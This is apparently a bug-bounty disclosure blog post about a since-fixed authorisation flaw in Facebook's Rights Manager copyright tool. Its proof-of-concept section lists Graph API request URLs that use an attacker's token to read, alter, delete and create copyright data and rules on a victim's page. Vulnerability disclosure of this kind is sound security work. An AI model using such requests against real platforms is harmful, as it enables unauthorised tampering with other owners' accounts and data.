Free way to Facebook Freebooting | Hacking Rights Manager

Freebooting is a sort of piracy, most commonly referred as downloading someone else’s copyrighted material and uploading it to any other internet platform, often videos from Youtube to Facebook. A security vulnerability in Facebook’s newly introduced platform called [Copy] Rights Manager (to prevent Freebooting) allows one to hack Facebook brand page copyright data easily. 

Facebook is trying hard to prevent Freebooting in their native video player. Recently in April, they introduced a tool called Rights Manager, where famous brands have the rights to detect and claim their copyrighted videos uploaded to Facebook. People who often upload copyrighted videos can easily be identified by this Feature.
Pages/Profiles who are constantly uploading copyrighted materials would eventually get banned.

Rights manager tool allows brands to upload their video items (source videos to detect pirated videos) and owners would get notified whenever someone uploads their copyrighted videos to Facebook. Copyright owners can request deletion of the detected pirated videos or add an exception for few brands in some cases.

So what’s the hack? 

Rights manager’s application interface allows end users to manipulate the request data and gain control over other brand page’s copyright source data. 
In layman’s terms, rights manager’s authentication mechanism is not validating requests properly so it allows any Facebook user without consent permission to read, edit and delete source video or manipulate the detected pirated video.

Technical Details

Rights Manager tool is preapproved for few official pages and any one can request for approval.

Facebook CopyRights Manager Tool Preview
Facebook CopyRights Manager Tool Preview
Once you are approved you can upload your videos to detect pirated copies around Facebook native video player.
Rights Manager uses Graph API and its official documentation shows some endpoints for third party app access. By default, Rights Manager GUI uses a pre-approved app called “273465416184080: Content Tab of a Page on www“. We can see the access token in the source code of
https://www.facebook.com/page_username/publishing_tools/?section=NEW_MATCHES

Since it is an app owned by Facebook, its access token allows us to read or manipulate data for any Brand page due to insufficient permission checks.

Proof of Concept :-

UPDATING VICTIM’s COPYRIGHT
https://graph.facebook.com/v2.6/<copyright_id_copied_from_victim_query>?method=post&monitoring_type=VIDEO_AND_AUDIO&access_token=<attacker_access_token>&whitelisted_ids
=<attacker_ids_to_bypass_copyright_check>&rule_id=<any_rule_id_if_you_wish_optional_field>&ownership_countries=<can_update_countries_as_well_but_optional>
All the above fields added in the parameters can be updated.

Reading Victim’s Copyrights
https://graph.facebook.com/v2.6/<victim_page_id>/video_copyrights?access_token=<attacker_access_token>

Deleting Victim’s Copyrights
https://graph.facebook.com/v2.6/<victim_page_copyright_id>?method=delete&access_token=<attacker_access_token>

Create copyright rule on behalf of victim’s page
https://graph.facebook.com/v2.6/<victim_page_id>/video_copyright_rules?access_token=<attacker_access_token>&name=testrule&condition_groups=[{action:”ALLOW”,conditions:[{type:”MONITORING_TYPE”,operator:”IS”,value:”VIDEO_ONLY”}]}]

Read Victim’s Copyright Rules
https://graph.facebook.com/v2.6/<victim_page_id>/video_copyright_rules?access_token=<attacker_access_token>

Delete Copyright Rule
https://graph.facebook.com/v2.6/<victim_page_copyright_rule_id>?method=delete&access_token=<attacker_access_token>

Facebook Acknowledgement of Fix and Bounty of $4000 USD

Facebook Acknowledgement of Fix and Bounty of $4000 USD
I thank Facebook Security team for quickly fixing this issue 🙂

Feel free to use our free Facebook video downloader online tool to download Facebook videos but beware of copyrights 😉

Laxman Muthiyah
Laxman Muthiyah
This is the place where I write about things that I have explored. I hope you enjoy your stay!

Related Stories

2 Comments

Leave A Reply

Please enter your comment!
Please enter your name here

Stay on top - Get the latest updates in your inbox